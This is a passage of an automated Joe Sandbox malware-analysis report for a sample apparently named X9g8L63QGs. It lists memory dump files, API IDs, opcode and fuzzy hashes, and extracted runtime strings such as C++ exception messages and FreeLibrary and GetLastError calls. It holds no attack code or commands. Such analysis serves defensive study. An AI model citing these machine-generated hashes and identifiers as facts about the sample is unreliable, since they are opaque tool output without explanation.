                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1712903325.00007FFB0C198000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713147144.00007FFB0C19A000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1713182254.00007FFB0C19C000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb0c020000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007C263010
                                                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                                                    • API String ID: 3122504284-2766056989
                                                                                                                                                                                                                                                                    • Opcode ID: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
                                                                                                                                                                                                                                                                    • Instruction ID: 857eee4f6457588a7658945925d7e584ba386dc7e0fdf8941cbf6b435cef3a0e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28e1e0f857556d647b9106a00d1fe80f73a9c471021f4b8bba851b4c0d99da9f
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D9418CE1D0C68386F6569F35E88C9756791BF44790F66413AE86D032A1EF3CB488C688
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1714746731.00007FFB1AB01000.00000040.00000001.01000000.00000012.sdmp, Offset: 00007FFB1AB00000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714712112.00007FFB1AB00000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB0E000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714746731.00007FFB1AB11000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714860777.00007FFB1AB12000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1714897323.00007FFB1AB13000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1ab00000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: 00007A4124
                                                                                                                                                                                                                                                                    • String ID: key is too long.$msg is too long.
                                                                                                                                                                                                                                                                    • API String ID: 1647237834-4266787399
                                                                                                                                                                                                                                                                    • Opcode ID: 83e2ac935dfbc44169b5b9482cf9ac7e30b64d6e74f5cd2553697f6cfdf18808
                                                                                                                                                                                                                                                                    • Instruction ID: c714e9c6e9a47bb302dd38a319f34bbcdfd836bf2849d071a72ab4909cce7032
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 83e2ac935dfbc44169b5b9482cf9ac7e30b64d6e74f5cd2553697f6cfdf18808
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 223132A5A08FC186E620CB31E59437AA37AFB99BA4F104276D94D53B54EF7CF045C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Name::operator+
                                                                                                                                                                                                                                                                    • String ID: void$void
                                                                                                                                                                                                                                                                    • API String ID: 2943138195-3746155364
                                                                                                                                                                                                                                                                    • Opcode ID: 9a107da830986a561f624b9ef5478456632fe2e7b7c502874fad34e42bf4480a
                                                                                                                                                                                                                                                                    • Instruction ID: e4d0ed312992019cd5c2c33c2d6ec1ad455b5a40ed05f57062f9202d4e2e9e05
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a107da830986a561f624b9ef5478456632fe2e7b7c502874fad34e42bf4480a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D13168E2F18F659AFB00ABB0D8480FD33B1BB49758B640136EE4E56B58DF789544C790
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715481605.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00007FFB1BB10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715437200.00007FFB1BB10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715481605.00007FFB1BB25000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715572310.00007FFB1BB26000.00000080.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715611009.00007FFB1BB28000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1bb10000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FeaturePresentProcessorcapture_previous_context
                                                                                                                                                                                                                                                                    • String ID: Q2"e
                                                                                                                                                                                                                                                                    • API String ID: 3936158736-2497648249
                                                                                                                                                                                                                                                                    • Opcode ID: 9c639d95daf90bba28fa37fb080816b33e3113327c7d8cd4b5b1572e04a0cf6c
                                                                                                                                                                                                                                                                    • Instruction ID: 84d69d2db04a35a2d0b7c658dbf24f3af797b3b69b1da64d06e6e8e763d4d608
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c639d95daf90bba28fa37fb080816b33e3113327c7d8cd4b5b1572e04a0cf6c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1D2129BCA08F4295EB248B25F85136673A6FB843A4F50A0B5D98D42BB4DF3CF406C700
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: FileHeader$ExceptionRaise
                                                                                                                                                                                                                                                                    • String ID: Access violation - no RTTI data!$Bad dynamic_cast!
                                                                                                                                                                                                                                                                    • API String ID: 3685223789-3176238549
                                                                                                                                                                                                                                                                    • Opcode ID: 31c157b8eb2ec39060d8679ded3c8c7a40717f4d930d4d3a676af0386f3d6913
                                                                                                                                                                                                                                                                    • Instruction ID: 0373725b725ce6c42797ff4204ceb8a5a102a0d2b35bf1a31e84c8b9783a7bf8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 31c157b8eb2ec39060d8679ded3c8c7a40717f4d930d4d3a676af0386f3d6913
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 370175E1B29E4693EE40EB34E4481F96362FF91B64FA09031D94E07765EF6CE905C790
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 24fc685d9c18a97879a9043e169dd32e9d23318a9617333a79ec660fdc06252e
• Instruction ID: 7c45b55aa0cb0e84c443c2c9298304df2dbb368ce1cad07da1b74f598a8a517a
• Opcode Fuzzy Hash: 24fc685d9c18a97879a9043e169dd32e9d23318a9617333a79ec660fdc06252e
• Instruction Fuzzy Hash: B91151B2618F8082EB119B25F4042AA77E6FB88B94F694234DECC47758DF3CC9518740
APIs
Strings
Memory Dump Source
• Source File: 00000007.00000002.1714967826.00007FFB1B6F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00007FFB1B6F0000, based on PE: true
• Associated: 00000007.00000002.1714933150.00007FFB1B6F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1714967826.00007FFB1B708000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1714967826.00007FFB1B710000.00000040.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1715084541.00007FFB1B712000.00000080.00000001.01000000.00000007.sdmp
• Associated: 00000007.00000002.1715123647.00007FFB1B714000.00000004.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1b6f0000_X9g8L63QGs.jbxd
Similarity
• API ID: FreeLibrary
• String ID: O&:FreeLibrary
• API String ID: 3664257935-2600264430
• Opcode ID: ab81c06c73e038f4722bd0195b2ba4bb40281938670383ef5ef7ebc0e01118fd
• Instruction ID: 5bc04a1baf0458a5e1b3a12a89338de00bbee45103ef65905701dd194b1a9f72
• Opcode Fuzzy Hash: ab81c06c73e038f4722bd0195b2ba4bb40281938670383ef5ef7ebc0e01118fd
• Instruction Fuzzy Hash: 1601E1A1E0CE4381EB509B76FC501396762FF55BA0F54E03AE95E43A74DE2CE4498700
APIs
  • Part of subcall function 00007FFB1C25E720: __except_validate_context_record.LIBVCRUNTIME ref: 00007FFB1C25E74B
  • Part of subcall function 00007FFB1C255508: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFB1C25108E), ref: 00007FFB1C255516
• terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB1C25E50A
Strings
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: __except_validate_context_recordabortterminate
• String ID: csm$f
• API String ID: 339134311-629598281
• Opcode ID: 049055b88727f29c58bed955df15e2ffd86eccd5c54e7ffa759ec555c1e45828
• Instruction ID: 5f838630f4e77e077a07ce51e5f5522173d07c1e425f9d0336be9db28dfe2c4a
• Opcode Fuzzy Hash: 049055b88727f29c58bed955df15e2ffd86eccd5c54e7ffa759ec555c1e45828
• Instruction Fuzzy Hash: C5E037E1908F4642D6547B71E5481FD6A56AF16764F248074DA880674ADE3CDC908691
APIs
• GetLastError.KERNEL32(?,?,?,00007FFB1C2553A9,?,?,?,?,00007FFB1C25F63F,?,?,?,?,?), ref: 00007FFB1C255543
• SetLastError.KERNEL32(?,?,?,00007FFB1C2553A9,?,?,?,?,00007FFB1C25F63F,?,?,?,?,?), ref: 00007FFB1C2555CC
Memory Dump Source
• Source File: 00000007.00000002.1715692326.00007FFB1C251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFB1C250000, based on PE: true
• Associated: 00000007.00000002.1715650944.00007FFB1C250000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715735925.00007FFB1C264000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715777428.00007FFB1C269000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1715818880.00007FFB1C26A000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_7ffb1c250000_X9g8L63QGs.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 550cea5c84bc0485e2971ce80c0edd506865995108a692b5126701225aaf57c4
• Instruction ID: 943ff53e6d2f4074526414d75faf9415207ae4db597075025092a3746861995c
• Opcode Fuzzy Hash: 550cea5c84bc0485e2971ce80c0edd506865995108a692b5126701225aaf57c4
• Instruction Fuzzy Hash: DE1100F0A19E9283EA14BB75E84C1FA2293AF457B0F244634DD6E467D9DE3CE841C690